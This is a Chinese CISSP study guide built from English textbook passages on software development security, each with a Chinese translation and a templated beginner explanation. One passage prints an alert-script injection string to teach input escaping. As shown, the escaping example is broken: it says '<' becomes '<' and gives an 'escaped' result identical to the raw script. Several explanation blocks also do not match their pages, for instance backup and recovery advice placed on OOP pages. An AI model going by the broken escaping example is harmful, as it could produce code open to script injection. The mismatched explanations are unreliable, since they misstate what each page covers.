你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
学习单元 03 / PDF P1326

第 1326 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

build security into every application they develop, with greater levels of security provided to critical applications and those that process sensitive information. It's extremely important to consider the security implications of a software development project from the early stages because it's much easier to build security into a system than it is to add security to an existing system. Programming Languages As you probably know, software developers use programming languages to develop software code. You might not know that several types of languages can be used simultaneously by the same system.

This section takes a brief look at the different types of programming languages and the security implications of each. Computers understand binary code. They speak a language of 1s and 0s, and that's it. The instructions that a computer follows consist of a long series of binary digits in a language known as machine language. Each central processing unit (CPU) chipset has its own machine language, and it's virtually impossible for a human being to decipher anything but the simplest machine language code without the assistance of specialized software.

Assembly language is a higher-level alternative that uses mnemonics to represent the basic instruction set of a CPU, but it still requires hardware-specific knowledge of a relatively obscure language. It also requires a large amount of tedious programming; a task as simple as adding two numbers together could take five or six lines of assembly code! Programmers don't want to write their code in either machine language or assembly language. They prefer to use high-level languages, such as Python, C, C#, C++, Ruby, R, Java, and Visual Basic.

These languages allow programmers to write instructions that better approximate human communication, decrease the length of time needed to craft an application, possibly decrease the number of programmers needed on a project, and allow some portability between different operating systems and hardware platforms. Once programmers are ready to execute their programs, two options are available to them: compilation and interpretation. Some languages (such as C, Java, and Fortran) are compiled languages.

When using a compiled language, the programmer uses a tool known as a compiler to convert source code from a higher-level language into an executable file designed for use on a specific operating system. This executable is then distributed to end users, who may use it as they see fit. Generally speaking,

中文直译 / 整理

将安全融入他们开发的每个应用程序中,对关键应用程序以及处理敏感信息的 应用程序提供更高水平的安全保护。 从早期阶段就考虑软件开发项目的安全影 响极为重要,因为在系统中内置安全比在现有系统中添加安全要容易得多。 编程语言 正如您可能知道的,软件开发人员使用编程语言来开发软件代码。 您可能不 知道,同一个系统可以同时使用多种类型的编程语言。 本节将简要介绍不同 类型的编程语言及其各自的安全影响。 计算机理解二进制代码。 它们只使用由1和0组成的语言进行通信。 计算机执行 的指令由一长串二进制数字组成,这种语言称为机器语言。 每个中央处理器 (CPU)芯片组都有其专属的机器语言,人类几乎不可能在没有专用软件辅助 的情况下解读任何复杂的机器语言代码。 汇编语言是一种更高层次的替代方案, 它使用助记符来表示CPU的基本指令集,但仍需要对这种相对晦涩的语言具备 硬件相关的知识。 此外,它还需要大量繁琐的编程工作; 即使是像将两个数字 相加这样简单的任务,也可能需要五到六行汇编代码! 程序员不希望用机器语言或汇编语言编写代码。

他们更喜欢使用高级语言,例 如 Python、C、C#、C++、Ruby、R、Java 和 Visual Basic。 这些语言使程 序员能够编写更接近人类交流的指令,缩短开发应用程序所需的时间,可能减 少项目所需的程序员数量,并允许在不同操作系统和硬件平台之间实现一定程 度的可移植性。 当程序员准备运行程序时,他们有两个选择:编译和解释。 某些语言(如 C、Java 和 Fortran)是编译型语言。 使用编译型语言时,程序 员使用一种称为 编译器 的工具,将源代码从高级语言转换为专为特定操作系统 设计的可执行文件。 然后,该可执行文件分发给最终用户,他们可以根据自己 的需求使用它。 一般来说,

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1326 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

IPS 放在线路中,误报可能影响可用性。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 04 / PDF P1327

第 1327 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

it's not possible to directly view or modify the software instructions in an executable file. However, specialists in the field of reverse engineering may be able to reverse the compilation process with the assistance of tools known as decompilers and disassemblers. Decompilers attempt to take binary executables and convert them back into source code form, whereas disassemblers convert back into machine-readable assembly language (an intermediate step during the compilation process).

These tools are particularly useful when you're performing malware analysis or competitive intelligence and you're attempting to determine how an executable file works without access to the underlying source code. Code protection techniques seek to either prevent or impede the use of decompilers and disassemblers through a variety of techniques. For example, obfuscation techniques seek to modify executables to make it more difficult to retrieve intelligible code from them. In some cases, languages rely on runtime environments to allow the portable execution of code across different operating systems. The Java virtual machine (JVM) is a well-known example of this type of runtime.

Users install the JVM runtime on their systems and may then rely on that runtime to execute compiled Java code. Other languages (such as Python, R, JavaScript, and VBScript) are interpreted languages. When these languages are used, the programmer distributes the source code, which contains instructions in the higher-level language. When end users execute the program on their systems, that automatically triggers the use of an interpreter to execute the source code stored on the system. If the user opens the source code file, they're able to view the original instructions written by the programmer. Each approach has security advantages and disadvantages.

Compiled code is generally less prone to manipulation by a third party. However, it's also easier for a malicious (or unskilled) programmer to embed backdoors and other security flaws in the code and escape detection because the original instructions can't be viewed by the end user. Interpreted code, however, is less prone to the undetected insertion of malicious code by the original programmer because the end user may view the code and check it for accuracy. On the other hand, everyone who touches the software has the ability to modify the programmer's original instructions and possibly embed malicious code in the interpreted software.

You'll learn more about the exploits malicious actors use to undermine software in the section

中文直译 / 整理

无法直接查看或修改可执行文件中的软件指令。 然而,逆向工程领域的专家可 能借助称为 反编译器 和 反汇编器 的工具,能够逆转编译过程。 反编译器试图 将二进制可执行文件转换回源代码形式,而反汇编器则将其转换回机器可读的 汇编语言(编译过程中的一个中间步骤)。 当您进行恶意软件分析或竞争情报 工作,并试图在无法访问底层源代码的情况下确定可执行文件的工作原理时, 这些工具尤其有用。 代码保护技术通过多种手段试图阻止或阻碍反编译器和反 汇编器的使用。 例如,混淆技术旨在修改可执行文件,使其更难以从中提取可 理解的代码。 在某些情况下,语言依赖于运行时环境来实现代码在不同操作系统上的可移植 执行。 Java虚拟机(JVM)是这种类型运行时的一个知名示例。 用户在其系统 上安装JVM运行时,然后可以依赖该运行时来执行已编译的Java代码。 其他语言(如Python、R、JavaScript和VBScript)是解释型语言。 当使用这 些语言时,程序员分发包含高级语言指令的源代码。 当最终用户在他们的系统 上运行程序时,会自动触发解释器来执行存储在系统上的源代码。 如果用户打 开源代码文件,他们就可以查看程序员编写的原始指令。

每种方法都有其安全优势和劣势。 编译后的代码通常较不容易被第三方篡改。 然而,恶意(或技术不佳)的程序员更容易在代码中嵌入后门和其他安全漏洞, 并逃避检测,因为最终用户无法查看原始指令。 相比之下,解释型代码较不容 易被原始程序员悄悄植入恶意代码,因为最终用户可以查看代码并检查其准确 性。 另一方面,任何接触该软件的人都有能力修改程序员的原始指令,并可能 在解释型软件中嵌入恶意代码。 您将在以下章节中了解更多关于恶意行为者用 来破坏软件的攻击手段:

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1327 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 05 / PDF P1328

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

“Application Attacks” in Chapter 21, “Malicious Code and Application Attacks.” Libraries Developers often rely on shared software libraries that contain reusable code. These libraries perform a variety of functions, ranging from text manipulation to machine learning, and are a common way for developers to improve their efficiency. After all, there's no need to write your own code to sort a list of items when you can just use a standard sorting library to do the work for you. Many of these libraries are available as open-source projects, whereas others may be commercially sold or maintained internally by a company.

Over the years, the use of shared libraries has resulted in many security issues. One of the most well-known and damaging examples of this is the Heartbleed vulnerability (CVE-2014-0160) that struck the OpenSSL library in 2014. The OpenSSL library is a very widely used implementation of Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols that was incorporated into thousands of other systems. In many cases, users of those systems had no idea that they were also using OpenSSL because of this incorporation. When the Heartbleed bug affected OpenSSL libraries, administrators around the world had to scramble to identify and update OpenSSL installations.

To protect against similar vulnerabilities, developers should be aware of the origins of their shared code and keep abreast of any security vulnerabilities that might be discovered in libraries that they use. This doesn't mean that shared libraries are inherently bad. In fact, it's difficult to imagine a world where shared libraries aren't widely used. It simply calls for vigilance and attention from software developers and cybersecurity professionals. Development Tool Sets Developers use a variety of tools to help them in their work. Most important among these is the integrated development environment (IDE).

IDEs provide programmers with a single environment where they can write their code, test it, debug it, and compile it (if applicable). The IDE simplifies the integration of these tasks, and the choice of an IDE is a personal decision for many developers. “

中文直译 / 整理

应用程序攻击”在 第21章,“恶意代码与应用程序攻击。 ” 库 开发人员通常依赖包含可重用代码的共享软件库。 这些库执行各种功能,从文 本处理到机器学习,是开发人员提高效率的常用方式。 毕竟,当你可以直接使 用标准排序库来完成列表排序工作时,就没有必要自己编写代码来排序了。 许多这些库作为开源项目提供,而其他一些则可能商业销售或由公司内部维护。 多年来,共享库的使用导致了许多安全问题。 其中最著名且破坏性最大的例子 之一是2014年影响OpenSSL库的Heartbleed漏洞(CVE‑2014‑0160)。 OpenSSL库是安全套接层(SSL)和传输层安全(TLS)协议的广泛使用实现, 被集成到数千个其他系统中。 在许多情况下,这些系统的用户并不知道他们也 在使用OpenSSL,因为这种集成。 当Heartbleed漏洞影响到OpenSSL库时, 全球的管理员不得不紧急查找并更新OpenSSL安装。 为了防范类似的漏洞,开发人员应了解其共享代码的来源,并及时掌握所使 用库中可能发现的安全漏洞。 这并不意味着共享库本质上是坏的。 事实上, 很难想象一个没有广泛使用共享库的世界。

这仅仅要求软件开发人员和网络 安全专业人员保持警惕和关注。 开发工具集 开发者使用各种工具来辅助他们的工作。 其中最重要的是集成开发环境(I DE)。 IDE 为程序员提供了一个单一的环境,他们可以在其中编写代码、测试 代码、调试代码并编译代码(如适用)。 IDE 简化了这些任务的集成,而 IDE 的选择对许多开发者来说是一个个人决定。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 06 / PDF P1329

第 1329 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Figure 20.1 shows an example of the open-source RStudio Desktop IDE used with the R programming language. FIGURE 20.1 RStudio Desktop IDE Object-Oriented Programming Many modern programming languages, such as C++, Java, and the .NET languages, support the concept of object-oriented programming (OOP). Other programming styles, such as functional programming and scripting, focus on the flow of the program itself and attempt to model the desired behavior as a series of steps. OOP focuses on the objects involved in an interaction. You can think of it as a group of objects that can be requested to perform certain operations or exhibit certain behaviors.

Objects work together to provide a system's functionality or capabilities. OOP has the potential to be more reliable and able to reduce the propagation of program change errors. As a type of programming method, it is better suited to modeling or mimicking the real world. For example, a banking program might have three object classes that correspond to accounts, account holders, and employees, respectively.

中文直译 / 整理

图 20.1展示了使用 R 编程语言的开源 RStudio Desktop IDE 的示例。 图 20.1 RStudio Desktop IDE 面向对象编程 许多现代编程语言,例如 C++、Java 和 .NET 语言,都支持面向对象编程( OOP)的概念。 其他编程风格,如函数式编程和脚本编程,则侧重于程序本身 的流程,并试图将所需行为建模为一系列步骤。 OOP 关注的是交互中涉及的对 象。 你可以将其理解为一组对象,它们可以被请求执行特定操作或表现出特定 行为。 对象协同工作以提供系统的功能或能力。 OOP 有可能更加可靠,并能减 少程序更改错误的传播。 作为一种编程方法,它更适合对现实世界进行建模或 模拟。 例如,一个银行程序可能包含三个对象类,分别对应账户、账户持有人 和员工。

小白解释

场景先行:你是公司的安全负责人,正在读第 1329 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1329 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 07 / PDF P1330

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

When a new account is added to the system, a new instance, or copy, of the appropriate object is created to contain the details of that account. Each object in the OOP model has methods that correspond to specific actions that can be taken on the object. For example, the account object can have methods to add funds, deduct funds, close the account, and transfer ownership. Objects can also be subclasses of other objects and inherit methods from their parent class. For example, the account object may have subclasses that correspond to specific types of accounts, such as savings, checking, mortgages, and auto loans.

The subclasses can use all the methods of the parent class and have additional class-specific methods. For example, the checking object might have a method called write_check(), whereas the other subclasses do not. From a security point of view, object-oriented programming provides a blackbox approach to abstraction. Users need to know the details of an object's interface (generally the inputs, outputs, and actions that correspond to each of the object's methods) but don't necessarily need to know the inner workings of the object to use it effectively.

To provide the desired characteristics of object-oriented systems, the objects are encapsulated (selfcontained), and they can be accessed only through specific messages (in other words, input). Objects can also exhibit the substitution property, which allows different objects providing compatible operations to be substituted for each other. Here are some common object-oriented programming terms you might come across in your work: Message A message is a communication to or input of an object. Method A method is internal code that defines the actions an object performs in response to a message. Behavior The results or output exhibited by an object is a behavior.

Behaviors are the results of a message being processed through a method. Class A class is a collection of the common methods from a set of objects that defines the behavior of those objects. Instance Objects are instances of or examples of classes that contain their methods.

中文直译 / 整理

当向系统添加新账户时,会创建相应对象的一个新实例(或副本),以存储该账 户的详细信息。 OOP 模型中的每个对象都具有对应于可对对象执行的特定操作的方法。 例如, 账户对象可以具有添加资金、扣除资金、关闭账户和转移所有权的方法。 对象也可以是其他对象的子类,并从其父类继承方法。 例如,账户对象可能具 有对应于特定类型账户的子类,如储蓄账户、支票账户、抵押贷款和汽车贷款。 子类可以使用父类的所有方法,并具有额外的特定于类的方法。 例如,支票对 象可能具有一个名为 write_check() 的方法,而其他子类则没有。 从安全角度来看,面向对象编程提供了黑盒式的抽象方法。 用户需要了解对象 接口的详细信息(通常是与对象每个方法相对应的输入、输出和操作),但不 一定需要了解对象的内部工作原理即可有效使用它。 为了提供面向对象系统的 期望特性,对象被封装(自包含),并且只能通过特定的消息(即输入)进行 访问。 对象还可以表现出替换属性,允许提供兼容操作的不同对象相互替换。 以下是您在工作中可能会遇到的一些常见面向对象编程术语: 消息 消息是对对象的通信或输入。 方法 方法是定义对象在响应消息时所执行操作的内部代码。

行为 对象表现出的结果或输出称为行为。 行为是消息通过方法处理后的结果。 类 类是一组对象的公共方法的集合,用于定义这些对象的行为。 实例 对象是类的实例或示例,包含其方法。

小白解释

场景先行:你是公司的安全负责人,正在读第 1330 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

抽象:抽象把复杂细节藏在接口后,只暴露必要功能。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

对象、角色、组、接口都可能体现 abstraction。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
学习单元 08 / PDF P1331

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Inheritance Inheritance occurs when methods from a class (parent or superclass) are inherited by another subclass (child) or object. Delegation Delegation is the forwarding of a request by an object to another object or delegate. An object delegates if it does not have a method to handle the message. Polymorphism A polymorphism is the characteristic of an object that allows it to respond with different behaviors to the same message or method because of changes in external conditions. Cohesion Cohesion describes the strength of the relationship between the purposes of the methods within the same class.

When all the methods have similar purposes, there is high cohesion, a desirable condition that promotes good software design principles. When the methods of a class have low cohesion, this is a sign that the system is not well designed. Coupling Coupling is the level of interaction between objects. Lower coupling means less interaction. Lower coupling provides better software design because objects are more independent. Lower coupling is easier to troubleshoot and update. Objects that have low cohesion require lots of assistance from other objects to perform tasks and have high coupling.

If you're interested in learning more about the difference between cohesion and coupling, see http://ducmanhphan.github.io/2019-03-23-Coupling-and-Cohension-inOOP. Assurance To ensure that the security control mechanisms built into a new application properly implement the security policy throughout the life cycle of the system, administrators use assurance procedures. Assurance procedures are simply formalized processes by which trust is built into the life cycle of a system. The Common Criteria provide a standardized approach to assurance used in government settings.

For more information on assurance and the Common Criteria, see Chapter 8, “Principles of Security Models, Design, and Capabilities.” Avoiding and Mitigating System Failure

中文直译 / 整理

继承 继承是指一个类(父类或超类)的方法被另一个子类(子类)或对象继承。 委托 委托是指一个对象将请求转发给另一个对象或委托者。 如果一个对象没有 处理该消息的方法,它就会进行委托。 多态性 多态性是对象的一种特性,它允许对象在外部条件变化时,对同一消息 或方法做出不同的行为响应。 内聚性 内聚性描述了同一类中各方法目的之间的关联强度。 当所有方法具有相 似的目的时,称为高内聚,这是一种促进良好软件设计原则的理想状态。 当一个 类的方法内聚性较低时,表明系统设计不佳。 耦合 耦合是指对象之间的交互程度。 耦合越低,交互越少。 较低的耦合有助 于实现更好的软件设计,因为对象更加独立。 低耦合更易于排查问题和更新。 内聚性低的对象需要大量其他对象的协助才能完成任务,因此具有高耦合。 如果您想进一步了解内聚性与耦合之间的区别,请参阅 http://ducmanhphan.github.io/2019-03-23-Coupling-and-Cohension-inOOP. 保证 为确保新应用程序中内置的安全控制机制在整个系统生命周期中正确实施安全 策略,管理员使用保证程序。 保证程序是通过正式化流程在系统生命周期中建 立信任的方法。

通用准则为政府环境中的保证提供了一种标准化方法。 有关保 证和通用准则的更多信息,请参见第8章,“安全模型、设计与能力的原则。 ” 避免和缓解系统故障

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 09 / PDF P1332

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

No matter how advanced your development team, your systems will likely fail at some point in time. You should plan for this type of failure when you put the software and hardware controls in place, ensuring that the system will respond appropriately. You can employ many methods to avoid failure, including using input validation and creating fail-secure or fail-open procedures. Let's talk about these in more detail. Input Validation As users interact with software, they often provide information to the application in the form of input. This may include typing in values that are later used by a program. Developers often expect these values to fall within certain parameters.

For example, if the programmer asks the user to enter a month, the program may expect to see an integer value between 1 and 12. If the user enters a value outside that range, a poorly written program may crash, at best, or allow the user to gain control of the underlying system, at worst. Input validation verifies that the values provided by a user match the programmer's expectation before allowing further processing. For example, input validation would check whether a month value is an integer between 1 and 12. If the value falls outside that range, the program will not try to process the number as a date and will inform the user of the input expectations.

This type of input validation, where the code checks to ensure that a number falls within an acceptable range, is known as a limit check. Input validation also may check for unusual characters, such as single quotation marks within a text field, which may be indicative of an attack. In some cases, the input validation routine can transform the input to remove risky character sequences and replace them with safe values. This process, known as escaping input, is performed by replacing occurrences of sensitive characters with alternative code that will render the same to the end user but will not be executed by the system.

For example, this HTML code would normally execute a script within the user's browser: <SCRIPT>alert('script executed')</SCRIPT> When we escape this input, we replace the sensitive < and > characters used to create HTML tags. < is replaced with < and > is replaced with > giving us this: <SCRIPT>alert('script executed')</SCRIPT> Input validation should always occur on the server side of the transaction. Any code sent to the user's browser is subject to manipulation by the user

中文直译 / 整理

无论您的开发团队多么先进,您的系统在某个时刻都可能失效。 在部署软件和 硬件控制措施时,您应为此类故障做好规划,确保系统能够做出适当响应。 您 可以采用多种方法避免故障,包括使用输入验证和创建故障安全或故障开放流 程。 让我们更详细地讨论这些方法。 输入验证当用户与软件交互时,他们通常以输入的形式向应用程序提供信息。 这 可能包括键入稍后由程序使用的值。 开发人员通常期望这些值落在特定参数范围 内。 例如,如果程序员要求用户输入月份,程序可能期望看到一个介于1到12之 间的整数值。 如果用户输入的值超出了该范围,编写不良的程序可能会崩溃,最 坏的情况下甚至允许用户获得对底层系统的控制权。 输入验证在允许进一步处理之前,验证用户提供的值是否符合程序员的预期。 例如,输入验证会检查月份值是否为介于1到12之间的整数。 如果该值超出该 范围,程序将不会尝试将该数字作为日期处理,并会告知用户输入的期望值。 这种类型的输入验证,即代码检查数字是否落在可接受范围内,被称为边界检 查。 输入验证还可能检查异常字符,例如文本字段中的单引号,这可能是攻击的迹 象。 在某些情况下,输入验证例程可以转换输入,移除风险字符序列并将其替 换为安全值。

此过程称为转义输入,通过将敏感字符的出现替换为替代代码来 实现,这些替代代码对最终用户呈现效果相同,但不会被系统执行。 例如,以 下HTML代码通常会在用户浏览器中执行脚本: <SCRIPT>alert('script executed')</SCRIPT> 当我们转义此输入时,我们会替换用于创建HTML标签的敏感< 和> 字符。 < 被替换为< ,> 被替换为> ,得到以下结果: <SCRIPT>alert('script executed')</SCRIPT> 输入验证应始终在交易的服务器端进行。 发送到用户浏览器的任何代码都可能 被用户篡改

小白解释

场景先行:你是公司的安全负责人,正在读第 1332 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 10 / PDF P1333

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

and is therefore easily circumvented. In most organizations, security professionals come from a system administration background and don't have professional experience in software development. If your background doesn't include this type of experience, don't let that stop you from learning about it and educating your organization's developers on the importance of secure coding. Authentication and Session Management Many applications, particularly web applications, require that users authenticate prior to accessing sensitive information or modifying data in the application.

